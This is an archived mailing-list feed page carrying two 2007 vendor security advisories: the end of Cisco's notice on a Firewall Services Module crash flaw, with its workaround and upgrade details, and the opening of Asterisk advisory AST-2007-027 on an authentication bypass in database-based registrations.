&lt;br&gt;CVSS at:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html&lt;/a&gt;&lt;br&gt;&lt;br&gt;Cisco has also provided a CVSS calculator to help compute the
&lt;br&gt;environmental impact for individual networks at:
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://intellishield.cisco.com/security/alertmanager/cvss&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://intellishield.cisco.com/security/alertmanager/cvss&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;CSCsl08519 - FWSM Version 3.2.3 System Software may crash with
&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Application Layer Protocol Inspection &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;
&lt;br&gt;CVSS Base Score - 7.8
&lt;br&gt;&amp;nbsp; Access Vector - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Network
&lt;br&gt;&amp;nbsp; Access Complexity - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Low
&lt;br&gt;&amp;nbsp; Authentication - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; None
&lt;br&gt;&amp;nbsp; Confidentiality Impact - &amp;nbsp; None
&lt;br&gt;&amp;nbsp; Integrity Impact - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; None
&lt;br&gt;&amp;nbsp; Availability Impact - &amp;nbsp; &amp;nbsp; &amp;nbsp;Complete
&lt;br&gt;&lt;br&gt;CVSS Temporal Score - 6.4
&lt;br&gt;&amp;nbsp; Exploitability - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Functional
&lt;br&gt;&amp;nbsp; Remediation Level - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Official-Fix
&lt;br&gt;&amp;nbsp; Report Confidence - &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Confirmed
&lt;br&gt;&lt;br&gt;Impact
&lt;br&gt;======
&lt;br&gt;&lt;br&gt;Successful exploitation of the vulnerability may result in a reload of
&lt;br&gt;the FWSM. &amp;nbsp;Repeated exploitation will result in a sustained denial of
&lt;br&gt;service attack.
&lt;br&gt;&lt;br&gt;Software Versions and Fixes
&lt;br&gt;===========================
&lt;br&gt;&lt;br&gt;When considering software upgrades, consult
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/go/psirt&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/go/psirt&lt;/a&gt;&amp;nbsp;and any subsequent advisories to
&lt;br&gt;determine exposure and a complete upgrade solution.
&lt;br&gt;&lt;br&gt;In all cases, customers should exercise caution to be certain the
&lt;br&gt;devices to be upgraded contain sufficient memory and that current
&lt;br&gt;hardware and software configurations will continue to be supported
&lt;br&gt;properly by the new release. If the information is not clear, contact
&lt;br&gt;the Cisco Technical Assistance Center (TAC) or your contracted
&lt;br&gt;maintenance provider for assistance.
&lt;br&gt;&lt;br&gt;FWSM software version 3.2(4) contains the fixes for the vulnerability
&lt;br&gt;described in this document and will be available for download the week
&lt;br&gt;beginning 31st December 2007.
&lt;br&gt;&lt;br&gt;FWSM software will be available for download from the following
&lt;br&gt;location on cisco.com: 
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/pcgi-bin/tablebuild.pl/cat6000-fwsm?psrtdcat20e2&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/pcgi-bin/tablebuild.pl/cat6000-fwsm?psrtdcat20e2&lt;/a&gt;&lt;br&gt;&lt;br&gt;Workarounds
&lt;br&gt;===========
&lt;br&gt;&lt;br&gt;* Disable the TCP normalizing function
&lt;br&gt;&amp;nbsp; 
&lt;br&gt;&amp;nbsp; Disabling the TCP normalizing function in the FWSM will mitigate
&lt;br&gt;&amp;nbsp; this vulnerability.
&lt;br&gt;&lt;br&gt;&amp;nbsp; The TCP normalizer performs the following action: for traffic that
&lt;br&gt;&amp;nbsp; passes through the control-plane path, such as packets that require
&lt;br&gt;&amp;nbsp; Layer 7 inspection or management traffic, the FWSM sets the maximum
&lt;br&gt;&amp;nbsp; number of out-of-order packets that can be queued for a TCP
&lt;br&gt;&amp;nbsp; connection to 2 packets. The TCP normalizer is enabled by default
&lt;br&gt;&amp;nbsp; and is not configurable except to enable or disable.
&lt;br&gt;&lt;br&gt;&amp;nbsp; To disable the TCP normalizing function, use the 
&lt;br&gt;&amp;nbsp; &amp;quot;no control-point tcp-normalizer&amp;quot; command in global configuration
&lt;br&gt;&amp;nbsp; mode, as shown in the following example.
&lt;br&gt;&lt;br&gt;&amp;nbsp; FWSM# config terminal
&lt;br&gt;&amp;nbsp; FWSM(config)# no control-point tcp-normalizer
&lt;br&gt;&amp;nbsp; FWSM(config)#
&lt;br&gt;&amp;nbsp; FWSM#
&lt;br&gt;&lt;br&gt;&amp;nbsp; Disabling the &amp;quot;control-point tcp-normalizer&amp;quot; will prevent strict
&lt;br&gt;&amp;nbsp; TCP checks, such as detecting out-of-sequence segments and
&lt;br&gt;&amp;nbsp; monitoring TCP options, on the TCP packets received on the Control
&lt;br&gt;&amp;nbsp; Plane for Layer 7 inspection in the FWSM, will not be performed.
&lt;br&gt;&amp;nbsp; The feature should be re-enabled after upgrading to a fixed version
&lt;br&gt;&amp;nbsp; of software.
&lt;br&gt;&lt;br&gt;Obtaining Fixed Software
&lt;br&gt;========================
&lt;br&gt;&lt;br&gt;Cisco has released free software updates that address these
&lt;br&gt;vulnerabilities. Prior to deploying software, customers should consult
&lt;br&gt;their maintenance provider or check the software for feature set
&lt;br&gt;compatibility and known issues specific to their environment.
&lt;br&gt;&lt;br&gt;Customers may only install and expect support for the feature sets
&lt;br&gt;they have purchased. By installing, downloading, accessing or
&lt;br&gt;otherwise using such software upgrades, customers agree to be bound by
&lt;br&gt;the terms of Cisco's software license terms found at 
&lt;br&gt;&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html&lt;/a&gt;&lt;br&gt;or as otherwise set forth at Cisco.com Downloads at 
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/public/sw-center/sw-usingswc.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/public/sw-center/sw-usingswc.shtml&lt;/a&gt;&lt;br&gt;&lt;br&gt;Do not contact &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14445449&amp;i=0&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;psirt@...&lt;/a&gt; or &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14445449&amp;i=1&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;security-alert@...&lt;/a&gt; for
&lt;br&gt;software upgrades.
&lt;br&gt;&lt;br&gt;Customers with Service Contracts
&lt;br&gt;+-------------------------------
&lt;br&gt;&lt;br&gt;Customers with contracts should obtain upgraded software through their
&lt;br&gt;regular update channels. For most customers, this means that upgrades
&lt;br&gt;should be obtained through the Software Center on Cisco's worldwide
&lt;br&gt;website at &lt;a href=&quot;http://www.cisco.com&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com&lt;/a&gt;.
&lt;br&gt;&lt;br&gt;Customers using Third-party Support Organizations
&lt;br&gt;+------------------------------------------------
&lt;br&gt;&lt;br&gt;Customers whose Cisco products are provided or maintained through
&lt;br&gt;prior or existing agreements with third-party support organizations,
&lt;br&gt;such as Cisco Partners, authorized resellers, or service providers
&lt;br&gt;should contact that support organization for guidance and assistance
&lt;br&gt;with the appropriate course of action in regards to this advisory.
&lt;br&gt;&lt;br&gt;The effectiveness of any workaround or fix is dependent on specific
&lt;br&gt;customer situations, such as product mix, network topology, traffic
&lt;br&gt;behavior, and organizational mission. Due to the variety of affected
&lt;br&gt;products and releases, customers should consult with their service 
&lt;br&gt;provider or support organization to ensure any applied workaround or
&lt;br&gt;fix is the most appropriate for use in the intended network before it
&lt;br&gt;is deployed.
&lt;br&gt;&lt;br&gt;Customers without Service Contracts
&lt;br&gt;+----------------------------------
&lt;br&gt;&lt;br&gt;Customers who purchase direct from Cisco but do not hold a Cisco
&lt;br&gt;service contract, and customers who purchase through third-party
&lt;br&gt;vendors but are unsuccessful in obtaining fixed software through
&lt;br&gt;their point of sale should acquire upgrades by contacting the Cisco
&lt;br&gt;Technical Assistance Center (TAC). TAC contacts are as follows.
&lt;br&gt;&lt;br&gt;&amp;nbsp; *	+1 800 553 2447 (toll free from within North America) 
&lt;br&gt;&amp;nbsp; *	+1 408 526 7209 (toll call from anywhere in the world) 
&lt;br&gt;&amp;nbsp; *	e-mail: &lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14445449&amp;i=2&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;tac@...&lt;/a&gt; 
&lt;br&gt;&lt;br&gt;Customers should have their product serial number available and be
&lt;br&gt;prepared to give the URL of this notice as evidence of entitlement to
&lt;br&gt;a free upgrade. Free upgrades for non-contract customers must be
&lt;br&gt;requested through the TAC.
&lt;br&gt;&lt;br&gt;Refer to &lt;a href=&quot;http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml&lt;/a&gt;&amp;nbsp;
&lt;br&gt;for additional TAC contact information, including localized telephone
&lt;br&gt;numbers, and instructions and e-mail addresses for use in various 
&lt;br&gt;languages.
&lt;br&gt;&lt;br&gt;Exploitation and Public Announcements
&lt;br&gt;=====================================
&lt;br&gt;&lt;br&gt;This issue was first discovered via internal testing at Cisco. &amp;nbsp;There
&lt;br&gt;are no known instances of intentional exploitation of this issue. 
&lt;br&gt;However, Cisco has observed data streams that appear to be
&lt;br&gt;unintentionally triggering the vulnerability.
&lt;br&gt;&lt;br&gt;Status of This Notice: INTERIM
&lt;br&gt;==============================
&lt;br&gt;&lt;br&gt;THIS DOCUMENT IS PROVIDED ON AN &amp;quot;AS IS&amp;quot; BASIS AND DOES NOT IMPLY ANY
&lt;br&gt;KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
&lt;br&gt;MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE 
&lt;br&gt;INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
&lt;br&gt;AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
&lt;br&gt;DOCUMENT AT ANY TIME.
&lt;br&gt;&lt;br&gt;A stand-alone copy or Paraphrase of the text of this document that
&lt;br&gt;omits the distribution URL in the following section is an 
&lt;br&gt;uncontrolled copy, and may lack important information or contain
&lt;br&gt;factual errors.
&lt;br&gt;&lt;br&gt;Distribution
&lt;br&gt;============
&lt;br&gt;&lt;br&gt;This advisory is posted on Cisco's worldwide website at:
&lt;br&gt;&lt;br&gt;&amp;nbsp;&lt;a href=&quot;http://www.cisco.com/warp/public/707/cisco-sa-20071219-fwsm.shtml&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/warp/public/707/cisco-sa-20071219-fwsm.shtml&lt;/a&gt;&lt;br&gt;&lt;br&gt;In addition to worldwide web posting, a text version of this notice
&lt;br&gt;is clear-signed with the Cisco PSIRT PGP key and is posted to the
&lt;br&gt;following e-mail and Usenet news recipients.
&lt;br&gt;&lt;br&gt;&amp;nbsp; *	&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14445449&amp;i=3&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;cust-security-announce@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; *	&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14445449&amp;i=4&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;first-teams@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; *	&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14445449&amp;i=5&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;bugtraq@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; *	&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14445449&amp;i=6&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;vulnwatch@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; *	&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14445449&amp;i=7&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;cisco@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; *	&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14445449&amp;i=8&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;cisco-nsp@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; *	&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14445449&amp;i=9&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;full-disclosure@...&lt;/a&gt;
&lt;br&gt;&amp;nbsp; *	&lt;a href=&quot;http://old.nabble.com/user/SendEmail.jtp?type=post&amp;post=14445449&amp;i=10&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;comp.dcom.sys.cisco@...&lt;/a&gt;
&lt;br&gt;&lt;br&gt;&amp;nbsp;
&lt;br&gt;Future updates of this advisory, if any, will be placed on Cisco's
&lt;br&gt;worldwide website, but may or may not be actively announced on mailing
&lt;br&gt;lists or newsgroups. Users concerned about this problem are encouraged
&lt;br&gt;to check the above URL for any updates.
&lt;br&gt;&lt;br&gt;Revision History
&lt;br&gt;================
&lt;br&gt;&lt;br&gt;+-----------------------------------------------------------+
&lt;br&gt;| Revision 1.0 | 2007-DECEMBER-19 | Initial public release. |
&lt;br&gt;+-----------------------------------------------------------+
&lt;br&gt;&lt;br&gt;Cisco Security Procedures
&lt;br&gt;=========================
&lt;br&gt;&lt;br&gt;Complete information on reporting security vulnerabilities in Cisco
&lt;br&gt;products, obtaining assistance with security incidents, and
&lt;br&gt;registering to receive security information from Cisco, is available
&lt;br&gt;on Cisco's worldwide website at 
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html&lt;/a&gt;&lt;br&gt;This includes instructions for press inquiries regarding Cisco 
&lt;br&gt;security notices. All Cisco security advisories are available at 
&lt;br&gt;&lt;a href=&quot;http://www.cisco.com/go/psirt&quot; target=&quot;_top&quot; rel=&quot;nofollow&quot;&gt;http://www.cisco.com/go/psirt&lt;/a&gt;&lt;br&gt;-----BEGIN PGP SIGNATURE-----
&lt;br&gt;Version: GnuPG v1.4.5 (Darwin)
&lt;br&gt;&lt;br&gt;iD8DBQFHaUDv86n/Gc8U/uARAvHcAJ9dYJ4/qb39Ts591wBQc2TQrmZoEQCdFAPK
&lt;br&gt;3jgY7lh9LmnGGhdJtyL/Q04=
&lt;br&gt;=G7ty
&lt;br&gt;-----END PGP SIGNATURE-----
&lt;br&gt;</content>
	<link rel="alternate" type="text/html" href="http://old.nabble.com/Cisco-Security-Advisory%3A-Application-Inspection-Vulnerability-in-Cisco-Firewall-Services-Module-tp14445449p14445449.html" />
</entry>

<entry>
	<id>tag:old.nabble.com,2006:post-14443915</id>
	<title>AST-2007-027 - Database matching order permits host-based authentication to be ignored</title>
	<published>2007-12-18T12:03:51Z</published>
	<updated>2007-12-18T12:03:51Z</updated>
	<author>
		<name>Asterisk Security Team-2</name>
	</author>
	<content type="html">&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Asterisk Project Security Advisory - AST-2007-027
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp;Product &amp;nbsp; &amp;nbsp; &amp;nbsp; | Asterisk &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|--------------------+---------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp;Summary &amp;nbsp; &amp;nbsp; &amp;nbsp; | Database matching order permits host-based &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| authentication to be ignored &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|--------------------+---------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| Nature of Advisory | Logic error &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|--------------------+---------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; Susceptibility &amp;nbsp; | Remote Unauthenticated Sessions &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|--------------------+---------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp;Severity &amp;nbsp; &amp;nbsp; &amp;nbsp;| Moderate &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|--------------------+---------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; Exploits Known &amp;nbsp; | No &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|--------------------+---------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;Reported On &amp;nbsp; &amp;nbsp; | October 30, 2007 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|--------------------+---------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp;Reported By &amp;nbsp; &amp;nbsp; | Tilghman Lesher &amp;lt;tlesher AT digium DOT com&amp;gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|--------------------+---------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; Posted On &amp;nbsp; &amp;nbsp; &amp;nbsp;| December 18, 2007 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|--------------------+---------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp;Last Updated On &amp;nbsp; | December 18, 2007 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|--------------------+---------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp;Advisory Contact &amp;nbsp;| Tilghman Lesher &amp;lt;tlesher AT digium DOT com&amp;gt; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;|--------------------+---------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp;CVE Name &amp;nbsp; &amp;nbsp; &amp;nbsp;| CVE-2007-6430 &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| Description | Due to the way database-based registrations (&amp;quot;realtime&amp;quot;) |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | are processed, IP addresses are not checked when the &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | username is correct and there is no password. An &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | attacker may impersonate any user using host-based &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | authentication without a secret, simply by guessing the &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | username of that user. This is limited in scope to &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | administrators who have set up the registration database |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | (&amp;quot;realtime&amp;quot;) for authentication and are using only &amp;nbsp; &amp;nbsp; &amp;nbsp; |
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | host-based authentication, not passwords. However, both &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | the SIP and IAX protocols are affected. &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| Resolution | As a workaround, administrators may set a password for &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| all users and peers in their registration &amp;quot;realtime&amp;quot; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| database. A fix is included in the newest release of &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;| Asterisk, as provided below. &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;+------------------------------------------------------------------------+
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Affected Versions &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;|
&lt;br&gt;&amp;nbsp; &amp;nbsp;|------------------------------------------------------------------------|
&lt;br&gt;&amp;nbsp; &amp;nbsp;| &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Product &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; | &amp;nbsp; Release &amp;nbsp; | &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; |
